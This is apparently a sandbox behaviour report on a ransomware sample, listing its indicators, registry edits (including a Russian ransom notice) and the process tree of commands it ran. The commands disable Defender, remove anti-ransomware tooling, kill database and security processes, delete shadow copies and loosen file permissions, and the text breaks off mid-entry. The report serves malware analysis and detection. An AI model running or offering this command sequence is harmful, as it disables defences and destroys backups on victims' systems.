Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1304	splwow64.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1852 wrote to memory of 380	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	30
PID 1852 wrote to memory of 380	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	30
PID 1852 wrote to memory of 380	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	30
PID 1852 wrote to memory of 380	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	30
PID 1852 wrote to memory of 572	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	32
PID 1852 wrote to memory of 572	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	32
PID 1852 wrote to memory of 572	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	32
PID 1852 wrote to memory of 572	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	32
PID 1852 wrote to memory of 1664	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	34
PID 1852 wrote to memory of 1664	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	34
PID 1852 wrote to memory of 1664	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	34
PID 1852 wrote to memory of 1664	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	34
PID 1852 wrote to memory of 1332	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	36
PID 1852 wrote to memory of 1332	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	36
PID 1852 wrote to memory of 1332	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	36
PID 1852 wrote to memory of 1332	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	36
PID 1852 wrote to memory of 1124	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	38
PID 1852 wrote to memory of 1124	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	38
PID 1852 wrote to memory of 1124	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	38
PID 1852 wrote to memory of 1124	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	38
PID 1852 wrote to memory of 624	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	40
PID 1852 wrote to memory of 624	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	40
PID 1852 wrote to memory of 624	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	40
PID 1852 wrote to memory of 624	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	40
PID 1852 wrote to memory of 696	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	42
PID 1852 wrote to memory of 696	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	42
PID 1852 wrote to memory of 696	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	42
PID 1852 wrote to memory of 696	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	42
PID 1852 wrote to memory of 664	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	43
PID 1852 wrote to memory of 664	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	43
PID 1852 wrote to memory of 664	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	43
PID 1852 wrote to memory of 664	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	43
PID 1852 wrote to memory of 1840	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	45
PID 1852 wrote to memory of 1840	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	45
PID 1852 wrote to memory of 1840	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	45
PID 1852 wrote to memory of 1840	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	45
PID 1852 wrote to memory of 1848	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	49
PID 1852 wrote to memory of 1848	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	49
PID 1852 wrote to memory of 1848	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	49
PID 1852 wrote to memory of 1848	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	49
PID 1852 wrote to memory of 748	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	50
PID 1852 wrote to memory of 748	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	50
PID 1852 wrote to memory of 748	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	50
PID 1852 wrote to memory of 748	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	50
PID 1852 wrote to memory of 1632	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	51
PID 1852 wrote to memory of 1632	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	51
PID 1852 wrote to memory of 1632	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	51
PID 1852 wrote to memory of 1632	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	51
PID 1852 wrote to memory of 1488	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	53
PID 1852 wrote to memory of 1488	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	53
PID 1852 wrote to memory of 1488	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	53
PID 1852 wrote to memory of 1488	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	53
PID 1852 wrote to memory of 1304	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	56
PID 1852 wrote to memory of 1304	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	56
PID 1852 wrote to memory of 1304	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	56
PID 1852 wrote to memory of 1304	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	56
PID 1852 wrote to memory of 580	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	57
PID 1852 wrote to memory of 580	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	57
PID 1852 wrote to memory of 580	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	57
PID 1852 wrote to memory of 580	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	57
PID 1852 wrote to memory of 1712	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	60
PID 1852 wrote to memory of 1712	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	60
PID 1852 wrote to memory of 1712	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	60
PID 1852 wrote to memory of 1712	1852	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	60

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Внимание Внимание Внимание!\r\n\r\nДобрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - [email protected]\r\n\r\nХорошего и продуктивного дня!"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Внимание Внимание Внимание!"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

C:\Users\Admin\AppData\Local\Temp\34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
"C:\Users\Admin\AppData\Local\Temp\34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe"
1⤵
- Modifies extensions of user files
- Windows security modification
- Enumerates connected drives
- Modifies WinLogon
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1852
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:380
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:572
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1664
- C:\Windows\SysWOW64\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:1332
- C:\Windows\SysWOW64\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:1124
- C:\Windows\SysWOW64\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:624
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:696
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:664
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:1840
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:1848
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:748
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:1632
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:1488
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:1304
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:580
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1712
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1684
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1560
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:856
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:1084
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1624
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1100
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:832
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:876
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1496
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:604
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:460
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1484
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1504
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1064
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1156
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:932
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:1564
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1040
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1168
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1104
- C:\Windows\SysWOW64\arp.exe
  "arp" -a
  2⤵
  PID:380
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:324
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1964
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1548
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1300
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1016
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1572
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:720
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:412
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1916
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:476
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:288
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:564
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1080
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1188
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1492
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1848
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2100
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2112
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2192
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2208
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2280
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2296
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2368
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2384
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2460
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2472
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2548
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ragent.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2592
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM rmngr.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2632
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM rphost.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2672
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM 1cv8.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2712
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2752
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2796
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2836
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2876
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2916
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM vmwp.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2956
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2996
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:1708
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:2060
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:2108
- C:\Windows\SysWOW64\arp.exe
  "arp" -a
  2⤵
  PID:2168
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\ExitInitialize.mov /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2252
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\CloseRequest.ps1 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2308
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ProtectSplit.mpa /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2316
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2376
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log.html /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:856
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1916
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:876
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1080
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:324
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_001_vcRuntimeMinimum_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:1492
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_002_vcRuntimeAdditional_x64.log /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2400
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Videos\Sample Videos\Wildlife.wmv /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2444
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2420
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2372
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Desert.jpg /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2500
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2492
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2536
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Koala.jpg /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2496
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2588
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2576
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2620
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Music\Sample Music\Kalimba.mp3 /grant *S-1-1-0:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2596
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2656
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Music\Sample Music\Sleep Away.mp3 /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2684
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\Public\Libraries\RecordedTV.library-ms /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2696
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2732
- C:\Windows\SysWOW64\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm /grant *S-1-1-0:F /T /C /Q
  2⤵
  PID:2720
- C:\Windows\SysWOW64\icacls.exe
